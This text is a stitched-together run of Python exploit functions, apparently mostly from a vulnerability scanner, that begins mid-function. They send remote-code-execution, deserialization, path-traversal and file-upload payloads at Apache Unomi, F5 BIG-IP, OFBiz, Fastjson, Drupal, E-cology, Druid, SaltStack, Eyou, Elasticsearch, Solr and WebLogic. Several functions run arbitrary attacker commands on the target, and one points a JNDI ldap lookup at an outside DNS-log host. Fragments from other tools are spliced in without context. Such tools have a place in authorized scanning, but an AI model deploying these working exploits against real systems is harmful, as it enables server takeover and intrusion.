name:" + url_cmd + "] " verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2020_13942_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Unomi: CVE-2020-13942" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2020_13942.replace( "RECOMMAND", "whoami") self.vul_info["vul_name"] = "Apache Unomi remote code execution" self.vul_info["vul_numb"] = "CVE-2020-13942" self.vul_info["vul_apps"] = "Unomi" self.vul_info["vul_date"] = "2020-11-23" self.vul_info["vul_vers"] = "< 1.5.2" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码," \ "漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过," \ "攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。" self.vul_info["cre_date"] = "2021-01-28" self.vul_info["cre_auth"] = "zhzyker" md = dns_request() cmd = "ping " + md self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd) self.headers = { 'User-Agent': self.ua, 'Accept': '*/*', 'Connection': 'close', 'Content-Type': 'application/json' } try: req = requests.post(self.url + "/context.json", data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) if dns_result(md): self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[dns] [cmd:" + cmd + "]" else: rep = list( json.loads(req.text) ["trackedConditions"])[0]["parameterValues"]["pagePath"] if r"/tracker/" in rep: self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info["prt_info"] = "[maybe]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_22986_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2021-22986" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution" self.vul_info["vul_numb"] = "CVE-2021-22986" self.vul_info["vul_apps"] = "Flink" self.vul_info["vul_date"] = "2021-03-11" self.vul_info["vul_vers"] = "< 16.0.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Remote Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "BIG-IP存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过BIG-IP" \ "管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令," \ "创建或删除文件以及替换服务。该中断只能通过控制界面利用,而不能通过数据界面利用。" self.vul_info["cre_date"] = "2021-03-20" self.vul_info["cre_auth"] = "zhzyker" headers = { 'User-Agent': self.ua, 'Accept': '*/*', 'Connection': 'close', 'Authorization': 'Basic YWRtaW46', 'X-F5-Auth-Token': '', 'Content-Type': 'application/json' } md = random_md5() cmd = "echo " + md data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace( "RECOMMAND", cmd) url = urljoin(self.url, "/mgmt/tm/util/bash") try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) r = json.loads(request.text)["commandResult"] if request.status_code == 200: if md in misinformation(r, md): self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["vul_payd"] = data self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_26295_exp(self, cmd): vul_name = "Apache OFBiz: CVE-2021-26295" headers = { 'User-Agent': self.ua, 'Content-Type': 'text/xml', 'Connection': 'close' } def _trans(s): return "%s" % ''.join('%.2x' % x for x in s) try: dns_data = bytes(cmd, encoding="utf8") dns_hex = _trans(dns_data) data = self.payload_cve_2021_26295_exp_1.replace( "RECOMMAND", dns_hex) url = urljoin(self.url, "/webtools/control/SOAPService") request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) if r"cus-obj" in request.text: data = self.payload_cve_2021_26295_exp_2.replace( "RECOMMAND", dns_hex) request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') if request.status_code == 200: r = "Command Executed Successfully (But No Echo)" else: r = "Command Executed Failed... ..." verify.exploit_print(r, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception as e: verify.error_print(vul_name)
def upload(self,address, port, filename, path = '/usr/www/' ): url = "http://%s:%d/include/upload.php?targetDir=%s" % ( address, port, path ) try: files = { 'file': open( filename, 'rb' ) } cookies = { 'kod_name': '1' } # LOL :D r = requests.post(url, files=files, cookies=cookies) if r.text != '{"jsonrpc" : "2.0", "result" : null, "id" : "id"}': print "[+] Unexpected response, exploit might not work:\n%s\n" % r.text return True except Exception as e: print "[-] ERROR: %s" % e return False
def fastjson_1262_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Fastjson: 1.2.62" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_payd"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞" self.vul_info["vul_numb"] = "null" self.vul_info["vul_apps"] = "Fastjson" self.vul_info["vul_date"] = "2019-10-07" self.vul_info["vul_vers"] = "<= 1.2.62" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "官方暂未发布针对此漏洞的修复版本,开启了autoType功能的受影响用户可通过关闭autoType来规避风险" \ "(autoType功能默认关闭),另建议将JDK升级到最新版本。" self.vul_info["cre_date"] = "2021-01-21" self.vul_info["cre_auth"] = "zhzyker" headers = {'User-Agent': self.ua, 'Content-Type': "application/json"} md = dns_request() dns = md data = { "@type": "org.apache.xbean.propertyeditor.JndiConverter", "AsText": "ldap://" + dns + "//exploit" } data = json.dumps(data) try: try: request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False) self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') except: pass if dns_result(md): self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] " self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] " verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2019_6340_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Drupal: CVE-2019-6340" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "drupal core restful remote code execution" self.vul_info["vul_numb"] = "CVE-2019-6340" self.vul_info["vul_apps"] = "Drupal" self.vul_info["vul_date"] = "2019-02-22" self.vul_info["vul_vers"] = "< 8.6.10" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "POST/PATCH 请求,在进行 REST API 操作的过程中,会将未经安全过滤的参数内容带入unserialize " \ "函数而触发反序列化漏洞,进而导致任意代码执行。" self.vul_info["cre_date"] = "2021-01-29" self.vul_info["cre_auth"] = "zhzyker" self.path = "/node/?_format=hal_json" md = random_md5() cmd = "echo " + md self.cmd_len = len(cmd) self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd, self.url) self.headers = { 'User-Agent': self.ua, 'Connection': "close", 'Content-Type': "application/hal+json", 'Accept': "*/*", 'Cache-Control': "no-cache" } try: request = requests.post(self.url + self.path, data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) if md in misinformation(request.text, md): self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_urls"] = self.payload self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def time_2021_0515_poc(self): self.threadLock.acquire() self.vul_info[ "prt_name"] = "E-cology OA WorkflowServiceXml RCE: time-2021-0515" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "E-cology OA WorkflowServiceXml RCE" self.vul_info["vul_numb"] = "time-2021-0415" self.vul_info["vul_apps"] = "E-cology" self.vul_info["vul_date"] = "2021-05-15" self.vul_info["vul_vers"] = "E-cology <= 9.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "RCE" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "The WorkflowServiceXml interface can be accessed without authorization. The attacker can call this interface to construct a specific HTTP request to bypass the security restrictions of E-cology itself to achieve remote command execution." self.vul_info["cre_date"] = "2021-05-19" self.vul_info["cre_auth"] = "zhzyker" url = urljoin(self.url, "/services%20/WorkflowServiceXml") md = random_md5() cmd = "echo " + md headers = { 'User-Agent': self.ua, 'SOAPAction': '""', 'cmd': cmd, "Content-Type": "text/xml;charset=UTF-8" } data = self.payload_time_2021_0515 try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) #print(self.url + " " + str(request.status_code) + request.text) if md in misinformation(request.text, md) and request.status_code == 500: self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = data self.vul_info["prt_info"] = "[rce: " + url + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_25646_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2021-25646" self.vul_info["vul_apps"] = "Druid" self.vul_info["vul_date"] = "2021-02-01" self.vul_info["vul_vers"] = "< 0.20.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。" \ "此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中," \ "经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。" \ "攻击者可直接构造恶意请求执行任意代码,控制服务器。" self.vul_info["cre_date"] = "2021-02-03" self.vul_info["cre_auth"] = "zhzyker" url = urljoin(self.url, "/druid/indexer/v1/sampler") headers = { 'Content-Type': 'application/json', 'User-Agent': self.ua, 'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2', 'Connection': 'keep-alive' } md = dns_request() cmd = "ping " + md data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd) try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) if dns_result(md): self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["vul_payd"] = data self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_25282_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "SaltStack: CVE-2021-25282" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "SaltStack 任意文件写入漏洞" self.vul_info["vul_numb"] = "CVE-2021-25282" self.vul_info["vul_apps"] = "SaltStack" self.vul_info["vul_date"] = "2021-02-25" self.vul_info["vul_vers"] = "< 3002.5" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "未经授权的访问wheel_async,通过salt-api可以执行任意代码/命令。" self.vul_info["cre_date"] = "2021-03-02" self.vul_info["cre_auth"] = "zhzyker" headers = { "User-agent": self.ua, "Content-Type": "application/json", "Connection": "close" } url = self.url + "/run" path = "../../../../../../../../../tmp/vuln" data = { 'eauth': 'auto', 'client': 'wheel_async', 'fun': 'pillar_roots.write', 'data': 'vuln_cve_2021_25282', 'path': path } data = json.dumps(data) try: r = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) tag = list(json.loads(r.text)["return"])[0]["tag"] jid = list(json.loads(r.text)["return"])[0]["jid"] if r"salt/wheel" in tag: if jid in tag: self.vul_info["vul_data"] = dump.dump_all(r).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info["vul_payd"] = path self.vul_info["prt_info"] = "[upload:" + path + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cnvd_2021_26422_exp(self, cmd): vul_name = "Eyou Email System: CNVD-2021-26422" url = urljoin(self.url, "/webadm/?q=moni_detail.do&action=gragh") payload = "type='|" + cmd + "||'" try: request = requests.post(url, data=payload, headers=self.headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def check_vulnerable_8(base_url): headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = get_random_string() cmd = urllib.quote('echo {0} | base64 -d'.format(base64.b64encode(r))) url = base_url + '/user/register?element_parents=timezone/timezone/%23value&ajax_form=1' data = 'form_id=user_register_form&_drupal_ajax=1&timezone[#post_render][]=exec&timezone[#markup]={0}'.format(cmd) resp = requests.post(url, data, headers=headers, verify=False) if r in str(resp.content): return True return False
def post(self, data): headers = { "Content-Type": "text/xml;charset=UTF-8", "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" } payload = "/wls-wsat/CoordinatorPortType" vulnurl = self.url + payload try: req = requests.post(vulnurl, data=data, headers=headers, timeout=10, verify=False) except Exception: log.error("[-] Connection Error") if self.confirm_sucess(): self.result = "[!] %s is vuln" % vulnurl
def cve_2015_1427_exp(self, cmd): vul_name = "Elasticsearch: CVE-2015-1427" self.data_send_info = r'''{ "name": "cve-2015-1427" }''' self.data_rce = self.payload_cve_2015_1427.replace("RECOMMAND", cmd) self.host = self.hostname + ":" + str(self.port) self.headers_text = { 'Host': "" + self.host, 'Accept': '*/*', 'Connection': 'close', 'Accept-Language': 'en', 'User-Agent': self.ua, 'Content-Type': 'application/text' } try: self.request = requests.post(self.url + "/website/blog/", data=self.data_send_info, headers=self.headers, timeout=self.timeout, verify=False) self.req = requests.post(self.url + "/_search?pretty", data=self.data_rce, headers=self.headers_text, timeout=self.timeout, verify=False) try: self.r = list(json.loads( self.req.text)["hits"]["hits"])[0]["fields"]["lupin"][0] except IndexError: self.r = "null" raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore') verify.exploit_print(self.r, raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception as e: verify.error_print(vul_name)
def cve_2019_17558_exp(self, cmd): vul_name = "Apache Solr: CVE-2019-17558" core_name = None payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd) url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except AttributeError: pass url_api = self.url + "/solr/" + str(core_name) + "/config" headers_json = { 'Content-Type': 'application/json', 'User-Agent': self.ua } set_api_data = """ { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } } """ request = requests.post(url_api, data=set_api_data, headers=headers_json, timeout=self.timeout, verify=False) request = requests.get(self.url + "/solr/" + str(core_name) + payload_2, headers=self.headers, timeout=self.timeout, verify=False) raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)